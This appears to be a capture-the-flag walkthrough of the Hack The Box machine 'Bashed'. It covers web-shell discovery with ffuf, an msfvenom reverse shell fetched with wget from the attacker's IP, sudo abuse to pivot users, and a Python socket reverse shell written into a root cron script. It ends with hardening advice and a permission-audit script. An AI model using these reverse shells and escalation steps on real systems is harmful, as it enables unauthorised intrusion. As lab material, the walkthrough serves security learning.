This was a pretty quick box, but for some reason I always find boxes where you hijack an admin script running from root's cron fun to work through. There are so many fun tricks to get a shell. A great list of reverse shells is here:
```
root@kali:/home/kali/htb/bashed# nmap -sC -sV -p- -O -oN nmap_full 10.10.10.68
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 00:12 EDT
Nmap scan report for 10.10.10.68
Host is up (0.055s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
10.10.10.68

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.72 seconds
```
There's a blog describing a php bash console.
It appears we're looking for a file called phpbash.php. This seems like a good use case for ffuf.
```
root@kali:/home/kali/htb/bashed# ffuf -w /opt/wordlists/common.txt -u http://10.10.10.68/FUZZ/phpbash.php -fs 42 -c -v

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.0.2
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.68/FUZZ/phpbash.php
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response size: 42
________________________________________________

[Status: 403, Size: 307, Words: 22, Lines: 12]
| URL | http://10.10.10.68/.htaccess/phpbash.php
    * FUZZ: .htaccess

[Status: 403, Size: 307, Words: 22, Lines: 12]
| URL | http://10.10.10.68/.htpasswd/phpbash.php
    * FUZZ: .htpasswd

[Status: 403, Size: 302, Words: 22, Lines: 12]
| URL | http://10.10.10.68/.hta/phpbash.php
    * FUZZ: .hta

[Status: 200, Size: 8151, Words: 3407, Lines: 216]
| URL | http://10.10.10.68/dev/phpbash.php
    * FUZZ: dev
```
Visiting http://10.10.10.68/dev/phpbash.php, I'm now the www-data user.
```
www-data@bashed:/var/www/html/dev# whoami
www-data
www-data@bashed:/var/www/html/dev# uname -a
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@bashed:/var/www/html/dev# cat /etc/*release*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
```
```
user.txt
2c281f318555dbc1b856957c7147bfc1
```
Listing all the hidden files in /home/arrexel, the .sudo_as_admin_successful marker shows this user has run sudo successfully.
```
www-data@bashed:/home/arrexel# ls -alh
total 36K
drwxr-xr-x 4 arrexel arrexel 4.0K Dec  4  2017 .
drwxr-xr-x 4 root    root    4.0K Dec  4  2017 ..
-rw------- 1 arrexel arrexel    1 Dec 23  2017 .bash_history
-rw-r--r-- 1 arrexel arrexel  220 Dec  4  2017 .bash_logout
-rw-r--r-- 1 arrexel arrexel 3.7K Dec  4  2017 .bashrc
drwx------ 2 arrexel arrexel 4.0K Dec  4  2017 .cache
drwxrwxr-x 2 arrexel arrexel 4.0K Dec  4  2017 .nano
-rw-r--r-- 1 arrexel arrexel  655 Dec  4  2017 .profile
-rw-r--r-- 1 arrexel arrexel    0 Dec  4  2017 .sudo_as_admin_successful
-r--r--r-- 1 arrexel arrexel   33 Dec  4  2017 user.txt
```
The passwd file contains another user called scriptmanager.
```
[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash
scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash
```
Since this is a non-interactive php shell, I want a more comfortable shell to work with.
```
root@kali:/home/kali/htb/bashed# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f elf -o shell
```
I host the shell with python's built-in web server, and use wget to download it to /var/tmp.
```
www-data@bashed:/var/tmp# wget http://10.10.14.2/shell
--2020-06-13 22:07:51--  http://10.10.14.2/shell
Connecting to 10.10.14.2:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 194 [application/octet-stream]
Saving to: 'shell'

     0K                                                       100% 19.3M=0s

2020-06-13 22:07:51 (19.3 MB/s) - 'shell' saved [194/194]
```
There is a small problem with this webshell. It doesn't pass + symbols through correctly (the + in the submitted command is decoded as a space, which is why chmod complains about an invalid mode of 'x'), so I use the octal form of chmod to set the binary as executable. Then, since this webshell seems to terminate processes as soon as the request completes, I background the shell execution with an &.
```
www-data@bashed:/var/tmp# chmod +x shell
chmod: invalid mode: 'x'
Try 'chmod --help' for more information.
www-data@bashed:/var/tmp# chmod 0755 shell
www-data:/var/tmp# ./shell &
```
My netcat listener catches the shell, and I use python to make it a pty.
```
root@kali:/home/kali# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.68] 59264
python -c 'import pty; pty.spawn("/bin/sh")'
$
```
There is an interesting file in /scripts.
```
$ ls -alh /scripts
ls: cannot access '/scripts/..': Permission denied
ls: cannot access '/scripts/test.py': Permission denied
ls: cannot access '/scripts/test.txt': Permission denied
ls: cannot access '/scripts/.': Permission denied
total 0
d????????? ? ? ? ? ? .
d????????? ? ? ? ? ? ..
-????????? ? ? ? ? ? test.py
-????????? ? ? ? ? ? test.txt
```
I try to cat the files but get a permission denied. Enumerating further, I notice www-data can run commands as scriptmanager.
```
$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
```
I can spawn another shell as scriptmanager to try and view the files.
```
$ sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/var/tmp$ ls -alh /scripts
total 16K
drwxrwxr--  2 scriptmanager scriptmanager 4.0K Dec  4  2017 .
drwxr-xr-x 23 root          root          4.0K Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Jun 13 22:25 test.txt
```
The files are now readable. I noticed the test.txt file is owned by root, and its timestamp is recent, so root is the user actually executing the script (presumably from cron).
```
scriptmanager@bashed:/var/tmp$ cat /scripts/test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/var/tmp$ cat /scripts/test.txt
cat /scripts/test.txt
testing 123!
```
All I need to do now is modify the script to run code for a reverse shell. I take some python from PayloadsAllTheThings and tweak it a bit.
```python
import socket,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.2",80))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")
```
I save this to a file on my kali machine, then I serve it up via smbserver.py and overwrite the test.py file.
```
scriptmanager@bashed:/scripts$ wget http://10.10.14.2/shell.py
--2020-06-13 22:57:01--  http://10.10.14.2/shell.py
Connecting to 10.10.14.2:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 190 [text/plain]
Saving to: 'shell.py'

shell.py            100%[===================>]     190  --.-KB/s    in 0s

2020-06-13 22:57:01 (20.9 MB/s) - 'shell.py' saved [190/190]

scriptmanager@bashed:/scripts$ mv shell.py test.py
```
I open a netcat listener, and in a few seconds, the reverse shell connects.
Security through obscurity gets a bad rap for a reason: it isn't enough, especially when you're sharing a web shell publicly.
The web shell gave me a low-privilege shell, and a chance to escalate privileges. There should be authentication in front of any type of shell or remote terminal.
Then, an admin script was running as root, but a low-privilege user was able to edit the script thanks to overly broad sudo privileges.
Ideally, any service accounts such as www-data should have privileges confined to just the files and services they need to access, and sudo permissions should be restricted. Theoretically, a web service user shouldn't even need write permissions to most things unless the web app is saving files.
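As an added example (not part of the original writeup), here is a small audit a defender could run against every script referenced from root's crontab: it checks the file and each parent directory for non-root ownership or group/world write bits, since a writable parent lets anyone replace a root-owned script. The BOX_FS fixture is constructed from the ls -alh /scripts output above (uid 1001 for scriptmanager is taken from /etc/passwd); HARDENED_FS and real_lookup are assumptions for comparison and live use.

```python
import os
import stat
from typing import Callable, Dict, List, Tuple

# Constructed fixture mirroring the box: /scripts is drwxrwxr-- owned by
# scriptmanager (uid 1001) and test.py is -rw-r--r-- owned by scriptmanager,
# yet root's cron executes the script. Values are (uid, permission bits).
BOX_FS: Dict[str, Tuple[int, int]] = {
    "/": (0, 0o755),
    "/scripts": (1001, 0o774),
    "/scripts/test.py": (1001, 0o644),
}

# Assumed hardened layout: root-owned all the way down, nothing group/world-writable.
HARDENED_FS: Dict[str, Tuple[int, int]] = {
    "/": (0, 0o755),
    "/scripts": (0, 0o755),
    "/scripts/test.py": (0, 0o644),
}


def ancestors(path: str) -> List[str]:
    """Return '/', each parent directory in order, then the path itself."""
    parts = [p for p in os.path.normpath(path).split("/") if p]
    return ["/"] + ["/" + "/".join(parts[: i + 1]) for i in range(len(parts))]


def audit_root_cron_target(path: str, lookup: Callable[[str], Tuple[int, int]]) -> List[str]:
    """List every reason a non-root user could change what root's cron ends up running."""
    findings: List[str] = []
    for p in ancestors(path):
        uid, mode = lookup(p)
        if uid != 0:
            findings.append(f"{p}: owned by uid {uid}, not root")
        if mode & stat.S_IWGRP:
            findings.append(f"{p}: group-writable")
        if mode & stat.S_IWOTH:
            findings.append(f"{p}: world-writable")
    return findings


def real_lookup(p: str) -> Tuple[int, int]:
    """Adapter for auditing a live host via os.stat (assumed helper)."""
    st = os.stat(p)
    return st.st_uid, stat.S_IMODE(st.st_mode)


if __name__ == "__main__":
    for finding in audit_root_cron_target("/scripts/test.py", BOX_FS.__getitem__):
        print(finding)
```

On the box's layout the audit reports three findings (two for the directory, one for the file); on the hardened layout it reports none.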
Always check sudo -l, and keep your eyes open for any lazy admin scripts that might be available to hijack.